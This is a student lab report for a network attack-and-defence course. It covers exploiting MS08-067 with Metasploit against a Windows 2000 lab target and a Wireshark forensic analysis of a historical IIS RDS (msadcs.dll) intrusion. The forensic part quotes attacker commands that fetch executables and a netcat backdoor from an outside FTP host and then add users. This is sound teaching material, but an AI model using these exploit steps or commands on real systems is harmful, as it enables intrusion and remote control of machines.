20253917 2025-2026-2 《网络攻防实践》实践6报告

20253917 2025-2026-2 《网络攻防实践》实践6报告

动手实践Metasploit windows attacker

kali中默认配置含有msfconsole，我们在终端输入msfconsole即可打开。状态如下图所示，攻击机ip为192.168.5.2，
而我们本次实验的靶机为另一网段的winserver2000 ip地址为192.168.5.133.两个网段子网掩码都为255.255.255.128。中间通过蜜网网关进行连接。

在前面的实验中我们对192.168.5.133的 winserver200 做了信息收集的处理，详情请参照实验二。我们已经所知了其操作系统与，开放的端口。我们也使用了Nessus对该靶机进行漏洞扫描。其中的高危因素就是445端口上的SMB服务，存在着缓冲区溢出的问题，
因此我们可以借助MSF08-067来进行攻击。

我们在进入msfconsole后输入search ms08-067可以看到攻击所适配的环境

我们使用info 82 也就是查看82号对应系统的漏洞参数，包括涉及的系统之类的

接下来我们使用use exploit/windows/smb/ms08_067_netapi 来选定攻击方式

我们使用show options可以查看该攻击方式所需要的具体参数：
RHSOT RPORT为靶机的具体信息，在此次的漏洞中SMB服务默认在445端口
LHOST LPORT 为攻击者所需要设定的参数，弹反shell等可能会需要

接下来进行参数的设置如下图所示输入即可，在此期间我的RHOST ip输入错误输入为了192.168.200.133，在后面重新设置参数做出了修改

接下来我们使用set payload命令设置payload参数，这里我使用的是windows/shell_bind_tcp 在实验指导视频中的payload会导致我的靶机服务报错无法正常使用shell因此我做了修改，随后使用命令exploit 或是run命令即可开始攻击，在下方我们很快就能够看到回显C\WINNT\system32 也就是说我们成功获取了对方的权限

如果你要查看所有的payload信息，你可以使用show payloads

取证分析实践：解码一次成功的NT系统破解攻击。

在学习通下载流量包后，需要更改后缀文件后缀文件默认为.log但使用wireshark打不开需要更改为.pcap
打开wireshark对其进行分析，该数据包中存在着tcp，http以及ftp协议，按照时间轴顺序而言最先正常访问受害主机的是HTTP服务

我们使用过滤器先对数据包进行过滤，过滤结果如下：可以发现前期均为正常请求，但在编号117的数据包中存在异常，他使用路径穿越在尝试着读取boot.ini 对于正常用户来说绝对不会这样去做，因此我们可以判定其为一次攻击。接下来我们对其进行分析。

从http数据包中往下翻，在很多的请求中都访问了/msadc/msadcs.dll 这一服务。经过搜索得知这实际上是windows的RDS漏洞。

在搜索引擎中查找相关信息发现其存在poc利用脚本，与其全名Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
https://www.exploit-db.com/exploits/19026
我们选择对其进行追踪，追踪tcp流，结果如下，很明显他在使用SQL语句进行注入操作，其中在数据包的结尾还存在!ADM!ROX!YOUR!WORLD!字符串十分异常。

对于以上字符串进行搜索得知，其攻击所使用的漏洞
🔍 漏洞身份：CVE-1999-1011
你所指的这个漏洞，正式编号为 CVE-1999-1011。它常被称为“Microsoft IIS RDS Vulnerability”或“msadc.pl exploit”。该漏洞在1999年左右被发现，曾在当时造成广泛影响。
🛡️ 漏洞原理与危害
!ADM!ROX!YOUR!WORLD! 这个字符串，是一个恶意HTTP请求中的“MIME分隔符”。攻击者通过向服务器上的 msadcs.dll 文件发送精心构造的请求，就能利用漏洞，无需验证就在服务器上执行任意系统命令。攻击者通常会进一步植入后门、部署DDoS攻击工具，甚至整个系统被控制。
⚙️ 受影响系统
这个漏洞主要影响以下过时版本：
Windows NT 4.0
IIS (Internet Information Services) 3.0 / 4.0
MDAC (Microsoft Data Access Components) 1.5, 2.0, 2.1
接着查看我们的数据包，向下进行翻阅，发现异常点：出现了windows的shell。

我们对异常数据包追踪tcp流，其使用了echo+open+213.116.251.162+>ftpcom 再打开213.116.251.162上的ftp服务

依次往下追踪，攻击者在操控服务器，访问213.116.251.162 上的ftp服务并且下载了两个exe文件，当然还有其他的文件，nc文件为其远程控制后门

之后便是FTP服务器的操作记录

在此可以看到对方使用的用户名以及密码，还有则是做了什么操作。
接下来我们继续追踪，在此时我们发现出现了很多的windows cmd命令，我们来详细分析一下其做了什么

首先删除了ftpcom清理痕迹：

查看账户权限，并且将net session >>yay3.txt 写入 但出现了权限不足的问题被拒绝了

继续往下翻，对方已经发现这是一个蜜罐了，并且留下了一条信息：echo Hi, i know that this a ..is a lab server, but patch the holes! 😃 >>README.NOW.Hax0r

有意思的是他还在继续做尝试，添加用户等操作。

在最后也是删掉了其上传的exe文件选择了离开

在重新梳理的过程中，发现红框内的大概率是其使用的攻击工具

（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。